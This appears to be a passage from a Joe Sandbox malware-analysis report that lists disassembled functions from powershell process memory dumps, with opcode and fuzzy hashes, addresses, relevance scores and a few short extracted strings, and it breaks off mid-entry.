                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_4a20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ef324c2996c583b4b0c65f7cb39c8764a69955b8f62f2f4898fd71d068c5e006
                                                                                          • Instruction ID: 6bcba755f8f38aee0b0d3215df1fd8b9de07d819903f7164d968196958155011
                                                                                          • Opcode Fuzzy Hash: ef324c2996c583b4b0c65f7cb39c8764a69955b8f62f2f4898fd71d068c5e006
                                                                                          • Instruction Fuzzy Hash: A0F0A731200604ABE704AB2DD88099BBBDAEFC5259B048A3ED6099B710DFB1BC05C7F1
                                                                                          Function 04A2767F Relevance: .0, Instructions: 31COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2406924637.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_4a20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 66c6f3d8ba954443ec46cb55e4975dc4d57babae0adad337c341dfeadec4de63
                                                                                          • Instruction ID: 1ded5ff7f7178ad252a87640e23c4fe331856001f811df951b7b570ae3cbc635
                                                                                          • Opcode Fuzzy Hash: 66c6f3d8ba954443ec46cb55e4975dc4d57babae0adad337c341dfeadec4de63
                                                                                          • Instruction Fuzzy Hash: 66F0E539300514CFDB00EBADE940A997BE2EBCC7557094169E909CB329EF30ED025BA1
                                                                                          Function 04A290E8 Relevance: .0, Instructions: 31COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2406924637.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_4a20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 638adcc1bef83a9754fc05b7965cd30c0c0976714419c3480bdd29f709ba23fa
                                                                                          • Instruction ID: e843815915b3786cc53f64d7e8f962c369a51a93b1b02c67b1217b1bc1cdf5d1
                                                                                          • Opcode Fuzzy Hash: 638adcc1bef83a9754fc05b7965cd30c0c0976714419c3480bdd29f709ba23fa
                                                                                          • Instruction Fuzzy Hash: 46F027717006044BE700BBA8C0183ABB796EFC431CF14822ED90A47388DE793C01CBE1
                                                                                          Function 04A2DE48 Relevance: .0, Instructions: 30COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2406924637.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_4a20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9798ebce91c67b4901ba170a5ea6283cc3f34d4c1eae16f6caa9ee04e44402a7
                                                                                          • Instruction ID: 166d854b7c99c33286e0108aa7a5c31d6c5a3c1532820a831f44a5c4cf9f9c7a
                                                                                          • Opcode Fuzzy Hash: 9798ebce91c67b4901ba170a5ea6283cc3f34d4c1eae16f6caa9ee04e44402a7
                                                                                          • Instruction Fuzzy Hash: B9E01A393001108F83509F1ED498C6AB7FAEFDE76572910AAE549CB331DB61EC01DB90
                                                                                          Function 04A29542 Relevance: .0, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2406924637.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_4a20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 34f62ef34cd73fa8217710540c86e3d20fd96acd9965bbfabc666e10a37cfcf2
                                                                                          • Instruction ID: b732beb71b3787808604d65bed769f17ae2937e6cfb732257d88d91c7002e1db
                                                                                          • Opcode Fuzzy Hash: 34f62ef34cd73fa8217710540c86e3d20fd96acd9965bbfabc666e10a37cfcf2
                                                                                          • Instruction Fuzzy Hash: 47E0681130A2E10A875262BC17102BB6FCA4FC606970802EFD900CB103D8088C05D3A3
                                                                                          Function 04A2DCD9 Relevance: .0, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2406924637.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_4a20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a3c093528fad3a241de7df703407ad6fc50a81dadef08de4564f9ecd7c6a49aa
                                                                                          • Instruction ID: d1cad1185fd90c8818c277cae24d32e140339a134d625443d0d109633f55db1c
                                                                                          • Opcode Fuzzy Hash: a3c093528fad3a241de7df703407ad6fc50a81dadef08de4564f9ecd7c6a49aa
                                                                                          • Instruction Fuzzy Hash: 6DE02B35714450578B18866CE8004F9FF75DFC9321F1481BFD406A7605DA31681597E1
                                                                                          Function 04A2896A Relevance: .0, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2406924637.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_4a20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cd39cf09e14d253e2a8ef8be827b0c8e003eb9956cef4acc3192917fa234fcfe
                                                                                          • Instruction ID: bfcd8c894911ccc216b4472131c562abe96996c145f9d75c08b1646e20af8296
                                                                                          • Opcode Fuzzy Hash: cd39cf09e14d253e2a8ef8be827b0c8e003eb9956cef4acc3192917fa234fcfe
                                                                                          • Instruction Fuzzy Hash: 55F0E53430D6A44BDB0A2778A51C6AD3FB1DFC6364F0906AFD606CB243CEA80905C7D6
                                                                                          Function 04A2CB68 Relevance: .0, Instructions: 27COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2406924637.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_4a20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5643d359090c3fafff8083639eb671c00b687275e89c239569684b46e91522ad
                                                                                          • Instruction ID: 9754a6dcd537412a456bc4d8c066fbf38d4515b626a538ceea2e3892e0934ea4
                                                                                          • Opcode Fuzzy Hash: 5643d359090c3fafff8083639eb671c00b687275e89c239569684b46e91522ad
                                                                                          • Instruction Fuzzy Hash: 13E04831301640579558B75E9C41C6EBACEDEC51A43544D3ED60E97700DEB56C0547B1
                                                                                          Function 04A2AF88 Relevance: .0, Instructions: 26COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2406924637.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_4a20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3a11f682f409109ecc3f7850f260cd1c1671787f36be5c77cff05d8ffbaa7676
                                                                                          • Instruction ID: 272fd0be6f135b562dc0c432e4222e02be627a05974e650ca4d28c11df01f912
                                                                                          • Opcode Fuzzy Hash: 3a11f682f409109ecc3f7850f260cd1c1671787f36be5c77cff05d8ffbaa7676
                                                                                          • Instruction Fuzzy Hash: AFE0862630C3E01F5B16523EA8605667FA7CFCB52035AC4FAE448CF252DC55DC0683E2
                                                                                          Function 04A29168 Relevance: .0, Instructions: 25COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2406924637.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_4a20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3887a9f0e57e0c329ff68829093240bae3af62694cc12ad500ce1a227ad91106
                                                                                          • Instruction ID: 5f8a76562858bfc980b4cda2a4b44dc1e7b3bf5155909fbc9ba18cbfe1c2c09b
                                                                                          • Opcode Fuzzy Hash: 3887a9f0e57e0c329ff68829093240bae3af62694cc12ad500ce1a227ad91106
                                                                                          • Instruction Fuzzy Hash: 81F06D70A017144BD7609FB9D49C79A7BE9EB44310F00486DE61ED3340DB7568808B90
                                                                                          Function 04A28978 Relevance: .0, Instructions: 24COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2406924637.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_4a20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4b10ead4698fbebfcfac2151c89330370ff53f738af3cc60111bd9160b675e2e
                                                                                          • Instruction ID: 883f2601b142c03568986702980b468c8dfe44ebe6b0f22cdc992fe4fc87969b
                                                                                          • Opcode Fuzzy Hash: 4b10ead4698fbebfcfac2151c89330370ff53f738af3cc60111bd9160b675e2e
                                                                                          • Instruction Fuzzy Hash: 00E0263130462847CB09377CA40C2AE7A9AEBC8728F04046EE60683341CFB82D0193D9
                                                                                          Function 04A29550 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2406924637.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_4a20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ec413790351df943af5c047b8d850cfc7bff4d4c44a11e6aeede9ac6309dd00b
                                                                                          • Instruction ID: 25d55489ba7a8e433adb11ea7aaa898ec249b14d9fec6d083aa5fdd04169c23c
                                                                                          • Opcode Fuzzy Hash: ec413790351df943af5c047b8d850cfc7bff4d4c44a11e6aeede9ac6309dd00b
                                                                                          • Instruction Fuzzy Hash: B3D05E1270123217169471BE1B107BBA5CF8FC88A9B05427AAE09C7242EE48EC05A3F1
                                                                                          Function 04A2DCE8 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2406924637.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_4a20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                          • Instruction ID: 6eb9ff3279e0f60c5c959297f0fe5cf08768dafdfa8e33504d1ba0ee4e15fd31
                                                                                          • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                          • Instruction Fuzzy Hash: 67E08631B10014978B48996DD4104EDF7BADBCC220F14807AD90AA7341DA32691596E1
                                                                                          Function 04A2F860 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2406924637.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_4a20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 381e65247fa2237c93ed2f98de441db168e897e501f6fa166de543b902da9be1
                                                                                          • Instruction ID: dc50cb752d9f406de63d1f1712c7a1b3aa18fac21cf85163c59c211de0868425
                                                                                          • Opcode Fuzzy Hash: 381e65247fa2237c93ed2f98de441db168e897e501f6fa166de543b902da9be1
                                                                                          • Instruction Fuzzy Hash: 41E06570D002099FC750DF7CC4015AAFBF0AF09214B5481ADE859DB351EB325503EBD1
                                                                                          Function 04A2C580 Relevance: .0, Instructions: 22COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2406924637.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_4a20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f8a8418c59df9e6fccb825aa83a3eb751d73d9eb6db9655438287cb912e9c467
                                                                                          • Instruction ID: 8697bc61b7395c50a81fa5050c88f90ec56a2cabe968534ebca55706f5c1b8f8
                                                                                          • Opcode Fuzzy Hash: f8a8418c59df9e6fccb825aa83a3eb751d73d9eb6db9655438287cb912e9c467
                                                                                          • Instruction Fuzzy Hash: 9DE07D323090501F8344673CA82446D7FE0EBD629130901BFE509C3342CA508C04C751
                                                                                          Function 04A28739 Relevance: .0, Instructions: 22COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2406924637.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_4a20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a0b7e86a27a3e8aa2b828b4cc5e2dfccd17a5cd551173332280d202994b62bc9
                                                                                          • Instruction ID: 440defe9e8a5b96800adb05598cba0eab3e606838209d73d65476c78ed50ca50
                                                                                          • Opcode Fuzzy Hash: a0b7e86a27a3e8aa2b828b4cc5e2dfccd17a5cd551173332280d202994b62bc9
                                                                                          • Instruction Fuzzy Hash: C3E04F3590415D8BCB0DABA4E85A4FDBF34EA05302B4001DCD95692192EAA01986CBC1
                                                                                          Function 04A28800 Relevance: .0, Instructions: 21COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2406924637.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_4a20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3ea946268f6c4603d09b4d24a51ebc9ccf16c067c7ccdaf5a4c2531045954c9f
                                                                                          • Instruction ID: 71f47f646dfb8e7475e0ff10aa25db1481d93ae6767fffc90ecfecf80019f6da
                                                                                          • Opcode Fuzzy Hash: 3ea946268f6c4603d09b4d24a51ebc9ccf16c067c7ccdaf5a4c2531045954c9f
                                                                                          • Instruction Fuzzy Hash: AAE0DF3490828A8BCB09DFB8E44686EBFB0FF06340F00439DE8099B202E6311881CFC2
                                                                                          Function 04A2C590 Relevance: .0, Instructions: 18COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2406924637.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_4a20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a9dc8e2f77cb90973fce4ad5fc7573058928370351c3fa1cf4de7807404e683c
                                                                                          • Instruction ID: 7d991628ec61130ce8d5098ef3e5a8236d905c8dca587b0cf28aa69ddbf9fd8f
                                                                                          • Opcode Fuzzy Hash: a9dc8e2f77cb90973fce4ad5fc7573058928370351c3fa1cf4de7807404e683c
                                                                                          • Instruction Fuzzy Hash: CFD0A7323000142B4204735DB81545977D9D7C9562305007FEA0DC3340DE61EC0583E5
                                                                                          Function 04A2F870 Relevance: .0, Instructions: 16COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2406924637.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_4a20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                          • Instruction ID: 0a50954437580db9c2cf58e1a1e8bb877c54e1c3df82b29ce502b6262523e58a
                                                                                          • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                          • Instruction Fuzzy Hash: 77D067B0E042199F8780EFADC94156EFBF4EB48200F6085AAD919E7301F7329A12DBD1
                                                                                          Function 04A28748 Relevance: .0, Instructions: 15COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2406924637.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_4a20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a782cb71965fe0aecae3a43eeef3b4ee0d4bc62d66c75b66d6d7a00ae89159af
                                                                                          • Instruction ID: 37f2d13f2ccb36db2b495a61efc5e12242b9fddf4599b284243f0ff7c783f7a8
                                                                                          • Opcode Fuzzy Hash: a782cb71965fe0aecae3a43eeef3b4ee0d4bc62d66c75b66d6d7a00ae89159af
                                                                                          • Instruction Fuzzy Hash: 8FD0623190411D8BCB0CABA5E45A4BD7B74FA14301F40419DD91792191EA711A56CAC5
                                                                                          Function 04A28810 Relevance: .0, Instructions: 15COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2406924637.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_4a20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3b100b278f59904cb3a8dd935486a11a26b288822dea43f922ecec9db6e2496b
                                                                                          • Instruction ID: 39fc161527f6e7051a598fc633db4c8ed4606ccea8c2e3601cc5c7ff91ff0140
                                                                                          • Opcode Fuzzy Hash: 3b100b278f59904cb3a8dd935486a11a26b288822dea43f922ecec9db6e2496b
                                                                                          • Instruction Fuzzy Hash: 32D01734A0821E8F8B08EFA8E44686EBBB4EB44200F0042A9E90993380EA306D01DFC1
                                                                                          Function 04A27E90 Relevance: .0, Instructions: 13COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2406924637.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_4a20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 87a8f58c17f529a0cd7d8021967ab10a02a1d5d2b1b66af37d260e8c5b8e9284
                                                                                          • Instruction ID: 7a1931c59a0cc68e9b185fc342179cb05be729eda0559d8de45c492df5fe4b26
                                                                                          • Opcode Fuzzy Hash: 87a8f58c17f529a0cd7d8021967ab10a02a1d5d2b1b66af37d260e8c5b8e9284
                                                                                          • Instruction Fuzzy Hash: D3C08C669293A04FEF9287380E6A0207F304A8310030A05C3C800CE023D8348C06E221
                                                                                          Function 04A27920 Relevance: .0, Instructions: 13COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2406924637.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_4a20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 58ea3bb1fc5f371dd0550937df4a6553211e110f8d56670e5ec84daebbf5cff2
                                                                                          • Instruction ID: 30767184ecf4c4e853188cbf0e10a71381f2364c0b7cc9889a70abab67746d99
                                                                                          • Opcode Fuzzy Hash: 58ea3bb1fc5f371dd0550937df4a6553211e110f8d56670e5ec84daebbf5cff2
                                                                                          • Instruction Fuzzy Hash: E6D012341457598FC7886F699D548153319EBC220578014A8F54D9B6A2DB26BD45DB00
                                                                                          Function 04A27928 Relevance: .0, Instructions: 8COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2406924637.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_4a20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 45e01f5de7ca80d4eb40001c6334d8ff1d2d071e9b2cfc32055b239b14dc1caf
                                                                                          • Instruction ID: 6ad14b1d0301234cb6a5bb134e1cbd57d05f995431d93642d2606843af117091
                                                                                          • Opcode Fuzzy Hash: 45e01f5de7ca80d4eb40001c6334d8ff1d2d071e9b2cfc32055b239b14dc1caf
                                                                                          • Instruction Fuzzy Hash: 5FB092301897488FC2486F75A844815732DAB8021538004A8E84E0A2A2CE76E885CA44

                                                                                          Executed Functions

                                                                                          Function 04A7B490 Relevance: 4.0, Strings: 3, Instructions: 258COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2448538060.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: kULn^${ULn^$[Ln^
                                                                                          • API String ID: 0-672335048
                                                                                          • Opcode ID: d3e8ea6c12109a8e56f8337f39068deafa471677f55612e2890e66f850aad968
                                                                                          • Instruction ID: 37dd4fb24cdd4c2a52a7ad3535d6db5ba7799e5e010873f7ce66b02b8bb062c3
                                                                                          • Opcode Fuzzy Hash: d3e8ea6c12109a8e56f8337f39068deafa471677f55612e2890e66f850aad968
                                                                                          • Instruction Fuzzy Hash: AD916B74B017559BEB19DFB488106AEBBF2EFC4600B80891DD156AF380DF34AD068BD5
                                                                                          Function 04A7B4A0 Relevance: 4.0, Strings: 3, Instructions: 252COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2448538060.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: kULn^${ULn^$[Ln^
                                                                                          • API String ID: 0-672335048
                                                                                          • Opcode ID: 140df815d1e7ec24e27fc1121e03fb825a910a3ca7cf7d1bdf8652583edc7bcd
                                                                                          • Instruction ID: e9a38bde99034eaa4486a779822ae6b438e69ee03d235067c62c0f426656cd9a
                                                                                          • Opcode Fuzzy Hash: 140df815d1e7ec24e27fc1121e03fb825a910a3ca7cf7d1bdf8652583edc7bcd
                                                                                          • Instruction Fuzzy Hash: 00915C74F017559BEB19DFB588106AEBBE6EFC4700B80891DD116AB380EF34AD058BD5
                                                                                          Function 07932308 Relevance: 8.1, Strings: 6, Instructions: 640COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2471649332.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_7930000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: piOk$piOk$piOk$piOk$piOk$|,Qk
                                                                                          • API String ID: 0-277957543
                                                                                          • Opcode ID: 80762aea417580ca3a64e4991c317d6ba02eba5321d2187150da5b746c081e9d
                                                                                          • Instruction ID: e9c32644e6730450b0bfe48895ee2321600aa70afdebd51932013e033ab0a1ae
                                                                                          • Opcode Fuzzy Hash: 80762aea417580ca3a64e4991c317d6ba02eba5321d2187150da5b746c081e9d
                                                                                          • Instruction Fuzzy Hash: CA2245B1B00206DFDB258FA8C4007AABBEAFFC5219F14847AD505CB252DB75DD45CBA2
                                                                                          Function 079317B8 Relevance: 2.8, Strings: 2, Instructions: 339COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2471649332.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_7930000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: }l$}l
                                                                                          • API String ID: 0-1599228476
                                                                                          • Opcode ID: 194301015915b44e75513a0fa31c0f4588566c768708aedbdb30dd84071bc56d
                                                                                          • Instruction ID: 1752827069414b18dbd92d9f6ce279cb05fc4a057b58830f059fba5d3b738e7f
                                                                                          • Opcode Fuzzy Hash: 194301015915b44e75513a0fa31c0f4588566c768708aedbdb30dd84071bc56d
                                                                                          • Instruction Fuzzy Hash: B3B167B1B4420ADFCB21CBA9D4006AABBEAEFC6215F14C47AD545CB262DB31DC41C7A1
                                                                                          Function 04A7C4D0 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2448538060.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: BLn^
                                                                                          • API String ID: 0-912168835
                                                                                          • Opcode ID: 4010342623709b9b0db275974fa4b1560a083c426bb07a72a5a8eef45fe6f00e
                                                                                          • Instruction ID: aa480fd4c0a6908acebcbc35267c0aca2fbb76a599fc7c9213727c344d9c1984
                                                                                          • Opcode Fuzzy Hash: 4010342623709b9b0db275974fa4b1560a083c426bb07a72a5a8eef45fe6f00e
                                                                                          • Instruction Fuzzy Hash: BAF09635205340AFD3159738DC509ABBBA5EFC72167048ABED149CF652CE329C05CBA0
                                                                                          Function 04A778F9 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2448538060.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ,({l
                                                                                          • API String ID: 0-1966167436
                                                                                          • Opcode ID: 5a9fef87ecf152d66bf4f55cc4affbe5fb8957e4d25811f93f31f40a9ee0fb79
                                                                                          • Instruction ID: ce519de54b5658855f08cb202decb1ad842f70eb702aa2e87d8cc192b3d1a617
                                                                                          • Opcode Fuzzy Hash: 5a9fef87ecf152d66bf4f55cc4affbe5fb8957e4d25811f93f31f40a9ee0fb79
                                                                                          • Instruction Fuzzy Hash: EDF0C2353043048BDB186ABDE4545BDB7E6EBC8325B20496CD54A8B791DE32F8428790
                                                                                          Function 04A7C4E0 Relevance: 1.3, Strings: 1, Instructions: 32COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2448538060.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
